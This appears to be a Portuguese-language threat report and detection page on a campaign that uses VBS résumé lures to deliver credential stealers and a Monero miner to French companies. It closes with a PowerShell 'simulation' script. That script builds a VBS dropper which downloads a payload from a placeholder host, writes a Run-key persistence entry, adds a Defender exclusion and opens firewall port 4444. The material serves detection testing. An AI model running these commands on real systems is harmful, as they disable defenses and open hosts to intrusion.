Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma operação de cibercrime utiliza um arquivo de currículo VBS malicioso para atacar ambientes corporativos de língua francesa. O dropper é altamente ofuscado e foi projetado para executar apenas em máquinas unidas a domínio, onde entrega malware de roubo de credenciais junto com um minerador de Monero. A campanha utiliza serviços confiáveis, como Dropbox, e sites WordPress marroquinos comprometidos para hospedar payloads. Dados roubados são exfiltrados através de SMTP para mail.ru, e o malware remove traços após a execução para reduzir a visibilidade forense.
Investigação
Pesquisadores realizaram engenharia reversa no dropper VBS, descobriram suas verificações de ambiente e mapearam toda a cadeia de infecção de múltiplos estágios, incluindo extração com 7-Zip, um RAT personalizado chamado RuntimeHost.exe, roubo de credenciais do navegador com ChromElevator e atividade de mineração com XMRig. Eles também identificaram infraestrutura de suporte, como endereços IP, entradas de DNS dinâmico e servidores WordPress invadidos. A persistência foi vinculada a chaves de execução no registro e a uma tarefa agendada oculta.
Mitigação
Os defensores devem bloquear arquivos VBS suspeitos e impor controles rígidos sobre anexos de e-mail. A monitoração deve se concentrar na execução anormal de wscript.exe, comandos PowerShell que adicionam exclusões ao Defender e alterações no registro que afetam o EnableLUA. As organizações devem restringir o SMTP de saída de aplicativos não-mail e observar conexões com infraestruturas conhecidas de Dropbox e pools de mineração. Quaisquer chaves de registro ou tarefas agendadas identificadas devem ser removidas ou colocadas em quarentena.
Resposta
As equipes de segurança devem detectar a criação das chaves de execução “Microsoft Media Service” e “z_MicrosoftEdgeAutoLaunch_2EDFBF”, juntamente com a tarefa agendada oculta “MicrosoftUpdateService”. Alertas devem ser acionados em processos wscript.exe que acessam o Dropbox ou os domínios WordPress documentados. Arquivos maliciosos devem ser colocados em quarentena, o host isolado e as credenciais expostas do navegador devem ser redefinidas. Uma revisão forense deve determinar se dados roubados foram exfiltrados através de mail.ru.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Node definitions step_phishing["<b>Técnica</b> – T1566.001 Phishing: Anexo Spearphishing<br/><b>Descrição</b>: E-mail com anexo malicioso que, quando aberto, entrega o payload inicial."] class step_phishing action step_user_execute["<b>Técnica</b> – T1204.002 Execução do Usuário: Arquivo Malicioso<br/><b>Descrição</b>: A vítima executa o arquivo VBS anexado, acionando o dropper."] class step_user_execute action step_dropper["<b>Técnica</b> – T1059.005 Visual Basic (VBScript)<br/><b>Técnica</b> – T1027 Arquivos ou Informações Ofuscadas<br/><b>Descrição</b>: Script VBS ofuscado atua como um dropper que extrai componentes adicionais."] class step_dropper action step_domain_check["<b>Técnica</b> – T1069.002 Descoberta de Grupo de Permissões: Domínio<br/><b>Descrição</b>: Verifica se o host está unido a um domínio para adaptar o comportamento."] class step_domain_check technique step_uac_bypass["<b>Técnica</b> – T1548.002 Contorno do Controle de Conta de Usuário<br/><b>Técnica</b> – T1562.001 Interferir nas Defesas: Desativar Ferramentas de Segurança<br/><b>Técnica</b> – T1564.012 Ocultar Artefatos: Exclusões do Defender<br/><b>Descrição</b>: Eleva privilégios, desativa defesas e adiciona exclusões."] class step_uac_bypass technique step_download["<b>Técnica</b> – T1102 Serviço Web<br/><b>Técnica</b> – T1102.001 Resolver Dead Drop<br/><b>Descrição</b>: Recupera payloads adicionais do Dropbox ou locais na web."] class step_download technique step_deploy_toolkit["<b>Ferramenta</b> – RuntimeHost.exe, Minerador XMRig, Roubo de Navegador<br/><b>Descrição</b>: Desdobra componentes para mineração, roubo de credenciais e exploração adicional."] class step_deploy_toolkit tool step_cred_access["<b>Técnica</b> – T1555.003 Credenciais de Navegadores Web<br/><b>Descrição</b>: Extrai senhas e cookies armazenados no navegador."] class step_cred_access technique step_collect_files["<b>Técnica</b> – T1005 Dados do Sistema Local<br/><b>Descrição</b>: Recolhe arquivos da área de trabalho do usuário para exfiltração."] class step_collect_files technique step_exfiltration["<b>Técnica</b> – T1048.002 Exfiltração Sobre Protocolo Não-C2 Encriptado: SMTP<br/><b>Técnica</b> – T1071.003 Protocolos Web: Protocolos de E-mail<br/><b>Descrição</b>: Envia dados coletados via SMTP encriptado."] class step_exfiltration technique step_resource_hijack["<b>Técnica</b> – T1496 Sequestro de Recursos<br/><b>Descrição</b>: Usa XMRig para minerar criptomoeda no host da vítima."] class step_resource_hijack technique step_process_injection["<b>Técnica</b> – T1055 Injeção de Processo<br/><b>Descrição</b>: Injeta código malicioso em explorer.exe para ocultar atividade."] class step_process_injection technique step_c2["<b>Técnica</b> – T1102 Serviço Web (HTTPS/DNS Dinâmico)<br/><b>Descrição</b>: Mantém comando e controle sobre tráfego web encriptado e portas personalizadas."] class step_c2 technique step_persistence["<b>Técnica</b> – T1547.001 Chaves Run do Registro / Pasta de Inicialização<br/><b>Técnica</b> – T1053 Tarefa/Trabalho Agendado (Oculto)<br/><b>Descrição</b>: Estabelece persistência por meio de chave Run e uma tarefa agendada oculta."] class step_persistence technique step_cleanup["<b>Técnica</b> – T1070.004 Exclusão de Arquivos<br/><b>Descrição</b>: Remove artefatos e logs para evitar a detecção."] class step_cleanup technique %% Edge connections step_phishing –>|leads_to| step_user_execute step_user_execute –>|leads_to| step_dropper step_dropper –>|leads_to| step_domain_check step_domain_check –>|leads_to| step_uac_bypass step_uac_bypass –>|leads_to| step_download step_download –>|leads_to| step_deploy_toolkit step_deploy_toolkit –>|enables| step_cred_access step_deploy_toolkit –>|enables| step_collect_files step_cred_access –>|combined_with| step_collect_files step_cred_access –>|supports| step_exfiltration step_collect_files –>|supports| step_exfiltration step_deploy_toolkit –>|enables| step_resource_hijack step_deploy_toolkit –>|enables| step_process_injection step_process_injection –>|provides| step_c2 step_c2 –>|used_by| step_exfiltration step_deploy_toolkit –>|establishes| step_persistence step_persistence –>|followed_by| step_cleanup step_exfiltration –>|followed_by| step_cleanup "
Fluxo de Ataque
Detecções
Possível Comunicação Tentada com Domínios de Lookup de IP (via dns)
Visualizar
Desativar Monitoramento em Tempo Real do Windows Defender e Outras Alterações de Preferências (via cmdline)
Visualizar
Execução Suspeita a partir do Perfil de Usuário Público (via process_creation)
Visualizar
Possível Evasão de Defesa Extraindo Arquivo Criptografado Usando 7-Zip (via cmdline)
Visualizar
LOLBAS WScript / CScript (via process_creation)
Visualizar
Modificação Suspeita de Exclusões do Defender (via cmdline)
Visualizar
Alterações Suspeitas nas Preferências do Windows Defender (via powershell)
Visualizar
Possíveis Pontos de Persistência [ASEPs – Hive Software/NTUSER] (via registry_event)
Visualizar
Tarefa Agendada Suspeita (via audit)
Visualizar
Nome Curto de Arquivo (via cmdline)
Visualizar
Possível Contorno de UAC – Tentativa de Desativação de UAC (via registry_event)
Visualizar
Arquivos Suspeitos no Perfil de Usuário Público (via file_event)
Visualizar
IOCs (HashSha256) para detectar: Analisando FAUX#ELEVATE: Atores de Ameaça Alvo França com Iscas de Curriculum Vitae para Implantar Mineradores de Criptomoedas e Roubadores de Informação Alvejando Ambientes Corporativos
Visualizar
IOCs (SourceIP) para detectar: Analisando FAUX#ELEVATE: Atores de Ameaça Alvo França com Iscas de Curriculum Vitae para Implantar Mineradores de Criptomoedas e Roubadores de Informação Alvejando Ambientes Corporativos
Visualizar
IOCs (Emails) para detectar: Analisando FAUX#ELEVATE: Atores de Ameaça Alvo França com Iscas de Curriculum Vitae para Implantar Mineradores de Criptomoedas e Roubadores de Informação Alvejando Ambientes Corporativos
Visualizar
IOCs (DestinationIP) para detectar: Analisando FAUX#ELEVATE: Atores de Ameaça Alvo França com Iscas de Curriculum Vitae para Implantar Mineradores de Criptomoedas e Roubadores de Informação Alvejando Ambientes Corporativos
Visualizar
Detecção de Mineração de Criptomoeda e Credenciais FAUX Elevate [Conexão de Rede do Windows]
Visualizar
Detecção de Comunicação de Domínio SMTP e C2 [Conexão de Rede do Windows]
Visualizar
Detecção de Persistência e Roubo de Credenciais da Campanha FAUX#ELEVATE [Criação de Processo do Windows]
Visualizar
Detecção de Dropper VBS Malicioso e Modificações de Firewall [Criação de Processo do Windows]
Visualizar
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria & Baseline deve ter sido aprovado.
Justificação: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e têm como objetivo gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa e Comandos do Ataque:
- Etapa 1 – Soltar VBS malicioso: O atacante escreve um dropper VBS que baixa um payload de segunda etapa e escreve uma chave de execução no registro para persistência.
- Etapa 2 – Executar VBS via
wscript.execom PowerShell como o processo pai, satisfazendo assim a condição pai-filho da detecção. - Etapa 3 – Dentro do VBS, invocar o PowerShell para adicionar uma exclusão no Microsoft Defender (T1562.001) e o Netsh para abrir a porta TCP de entrada 4444 (T1562.004) para C2.
- Etapa 4 – Limpar evidências após o sucesso.
-
Script de Teste de Regressão: (PowerShell – auto-contido; executar com direitos administrativos)
# ----------------------------------------------------------------------- # Simulação de Dropper VBS Malicioso – aciona a regra Sigma: # Imagem == "*wscript.exe" E ImagemPai em ("*powershell.exe","*netsh.exe") # ----------------------------------------------------------------------- $vbsPath = "$env:Tempmalicious_dropper.vbs" $payloadUrl = "http://example.com/payload.exe" # endereço de URL substituto $payloadPath = "$env:Temppayload.exe" # 1. Criar VBS malicioso que: # • Baixa um payload # • Escreve uma chave Run para persistência # • Chama PowerShell para adicionar exclusão no Defender # • Chama Netsh para abrir uma regra de firewall $vbsContent = @" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET", "$payloadUrl", False objXML.Send If objXML.Status = 200 Then Set objStream = CreateObject("ADODB.Stream") objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile "$payloadPath", 2 End If
‘ Persistir via chave Run Set objShell = CreateObject(“WScript.Shell”) objShell.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious”, “$payloadPath”
‘ Exclusão no Defender via PowerShell (executado em linha) objShell.Run “powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'“”, 0, True
‘ Abrir porta 4444 do firewall via Netsh (executado em linha) objShell.Run “netsh.exe advfirewall firewall add rule name="MaliciousPort” dir=in action=allow protocol=TCP localport=4444″, 0, True “@
Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 2. Lançar o VBS com PowerShell como o processo pai
Write-Host "[*] Lançando VBS malicioso via wscript.exe (pai: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait
# 3. Verificar se a regra de firewall foi adicionada (opcional)
netsh advfirewall firewall show rule name=MaliciousPort
# 4. Limpar artefatos (payload & VBS) – deixado para seção de limpeza separada
Write-Host "[+] Simulação concluída. Revise alertas no SIEM."
-
Comandos de Limpeza: (executar após verificação)
# Remover regra de firewall netsh advfirewall firewall delete rule name="MaliciousPort" # Remover exclusão do Defender powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'" # Deletar chave de persistência Run reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f # Deletar arquivos Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force Remove-Item -Path "$env:Temppayload.exe" -Force Write-Host "[+] Limpeza concluída."